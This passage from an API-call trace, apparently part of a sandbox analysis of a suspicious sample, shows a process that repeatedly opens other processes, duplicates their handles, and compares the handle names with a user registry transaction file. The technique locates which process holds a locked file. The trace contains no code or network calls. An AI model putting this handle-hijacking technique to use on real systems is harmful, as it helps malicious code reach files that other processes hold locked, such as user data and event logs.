CloseHandle (hObject=0x194) returned 1 [0165.710] CloseHandle (hObject=0x1e8) returned 1 [0165.710] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.710] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x174, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.710] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.710] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.711] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.711] CloseHandle (hObject=0x1e4) returned 1 [0165.711] CloseHandle (hObject=0x194) returned 1 [0165.711] CloseHandle (hObject=0x1e8) returned 1 [0165.711] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.712] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x17c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.712] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.712] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.713] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.713] CloseHandle (hObject=0x1e4) returned 1 [0165.714] CloseHandle (hObject=0x194) returned 1 [0165.714] CloseHandle (hObject=0x1e8) returned 1 [0165.714] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.714] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x180, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.714] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.714] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.715] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.715] CloseHandle (hObject=0x1e4) returned 1 [0165.715] CloseHandle (hObject=0x194) returned 1 [0165.715] CloseHandle (hObject=0x1e8) returned 1 [0165.715] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.715] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x184, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.715] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.716] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.717] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.717] CloseHandle (hObject=0x1e4) returned 1 [0165.717] CloseHandle (hObject=0x194) returned 1 [0165.717] CloseHandle (hObject=0x1e8) returned 1 [0165.717] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.717] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.717] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.718] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.719] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.719] CloseHandle (hObject=0x1e4) returned 1 [0165.719] CloseHandle (hObject=0x194) returned 1 [0165.719] CloseHandle (hObject=0x1e8) returned 1 [0165.719] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.719] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.719] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.720] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.721] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.721] CloseHandle (hObject=0x1e4) returned 1 [0165.721] CloseHandle (hObject=0x194) returned 1 [0165.721] CloseHandle (hObject=0x1e8) returned 1 [0165.721] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.721] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.721] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.722] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.723] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.723] CloseHandle (hObject=0x1e4) returned 1 [0165.723] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0165.723] CloseHandle (hObject=0x194) returned 1 [0165.723] CloseHandle (hObject=0x1e8) returned 1 [0165.723] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.723] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.723] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.724] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.725] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.725] CloseHandle (hObject=0x1e4) returned 1 [0165.725] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0165.725] CloseHandle (hObject=0x194) returned 1 [0165.725] CloseHandle (hObject=0x1e8) returned 1 [0165.725] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x294) returned 0x1e8 [0165.725] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.725] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.726] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.727] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.727] CloseHandle (hObject=0x1e4) returned 1 [0165.727] _wcsicmp (_Str1="\\epmapper", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0165.727] CloseHandle (hObject=0x194) returned 1 [0165.727] CloseHandle (hObject=0x1e8) returned 1 [0165.728] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.728] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.728] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.728] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.729] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.729] CloseHandle (hObject=0x1e4) returned 1 [0165.730] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.730] CloseHandle (hObject=0x194) returned 1 [0165.730] CloseHandle (hObject=0x1e8) returned 1 [0165.730] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.730] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.730] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.731] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.731] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.732] CloseHandle (hObject=0x1e4) returned 1 [0165.732] CloseHandle (hObject=0x194) returned 1 [0165.732] CloseHandle (hObject=0x1e8) returned 1 [0165.732] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.732] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x124, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.732] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.732] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.733] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.733] CloseHandle (hObject=0x1e4) returned 1 [0165.734] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0165.734] CloseHandle (hObject=0x194) returned 1 [0165.734] CloseHandle (hObject=0x1e8) returned 1 [0165.734] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.734] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x128, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.734] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.735] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.735] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.735] CloseHandle (hObject=0x1e4) returned 1 [0165.736] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0165.736] CloseHandle (hObject=0x194) returned 1 [0165.736] CloseHandle (hObject=0x1e8) returned 1 [0165.736] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.736] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.736] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.737] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.737] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.737] CloseHandle (hObject=0x1e4) returned 1 [0165.738] _wcsicmp (_Str1="\\eventlog", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -9 [0165.738] CloseHandle (hObject=0x194) returned 1 [0165.738] CloseHandle (hObject=0x1e8) returned 1 [0165.738] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.738] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.738] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.739] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.740] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.740] CloseHandle (hObject=0x1e4) returned 1 [0165.740] _wcsicmp (_Str1="\\lastalive1.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0165.740] CloseHandle (hObject=0x194) returned 1 [0165.740] CloseHandle (hObject=0x1e8) returned 1 [0165.740] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.740] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.740] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.741] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.742] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.742] CloseHandle (hObject=0x1e4) returned 1 [0165.742] _wcsicmp (_Str1="\\lastalive0.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -2 [0165.742] CloseHandle (hObject=0x194) returned 1 [0165.742] CloseHandle (hObject=0x1e8) returned 1 [0165.742] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.742] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x15c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.742] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.745] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.746] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.746] CloseHandle (hObject=0x1e4) returned 1 [0165.746] _wcsicmp (_Str1="\\Microsoft-Windows-Kernel-Power%4Thermal-Operational.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0165.746] CloseHandle (hObject=0x194) returned 1 [0165.746] CloseHandle (hObject=0x1e8) returned 1 [0165.746] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.746] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x160, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.747] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.747] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.748] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.748] CloseHandle (hObject=0x1e4) returned 1 [0165.748] CloseHandle (hObject=0x194) returned 1 [0165.748] CloseHandle (hObject=0x1e8) returned 1 [0165.748] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.748] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x194, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.748] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.749] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.750] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.750] CloseHandle (hObject=0x1e4) returned 1 [0165.750] _wcsicmp (_Str1="\\CatalogChangeListener-2c8-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -11 [0165.750] CloseHandle (hObject=0x194) returned 1 [0165.750] CloseHandle (hObject=0x1e8) returned 1 [0165.750] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.750] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x19c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.750] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.751] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.752] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.752] CloseHandle (hObject=0x1e4) returned 1 [0165.752] CloseHandle (hObject=0x194) returned 1 [0165.752] CloseHandle (hObject=0x1e8) returned 1 [0165.752] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.752] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.752] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.753] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.753] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.754] CloseHandle (hObject=0x1e4) returned 1 [0165.754] CloseHandle (hObject=0x194) returned 1 [0165.754] CloseHandle (hObject=0x1e8) returned 1 [0165.754] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.754] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.754] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.755] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.755] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.756] CloseHandle (hObject=0x1e4) returned 1 [0165.756] CloseHandle (hObject=0x194) returned 1 [0165.756] CloseHandle (hObject=0x1e8) returned 1 [0165.756] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.756] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.756] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.757] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.758] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.758] CloseHandle (hObject=0x1e4) returned 1 [0165.758] _wcsicmp (_Str1="\\System.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.758] CloseHandle (hObject=0x194) returned 1 [0165.758] CloseHandle (hObject=0x1e8) returned 1 [0165.758] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.758] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.758] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.759] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.760] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.760] CloseHandle (hObject=0x1e4) returned 1 [0165.760] _wcsicmp (_Str1="\\Application.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0165.760] CloseHandle (hObject=0x194) returned 1 [0165.760] CloseHandle (hObject=0x1e8) returned 1 [0165.760] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.760] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.760] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.761] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.762] CloseHandle (hObject=0x1e4) returned 1 [0165.762] _wcsicmp (_Str1="\\Internet Explorer.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0165.762] CloseHandle (hObject=0x194) returned 1 [0165.762] CloseHandle (hObject=0x1e8) returned 1 [0165.762] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.762] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x204, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0165.762] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0165.762] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0165.763] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0165.763] CloseHandle (hObject=0x1e4) returned 1 [0165.763] _wcsicmp (_Str1="\\Security.evtx", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0165.763] CloseHandle (hObject=0x194) returned 1 [0165.763] CloseHandle (hObject=0x1e8) returned 1 [0165.764] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x2c8) returned 0x1e8 [0165.764] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x210, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, 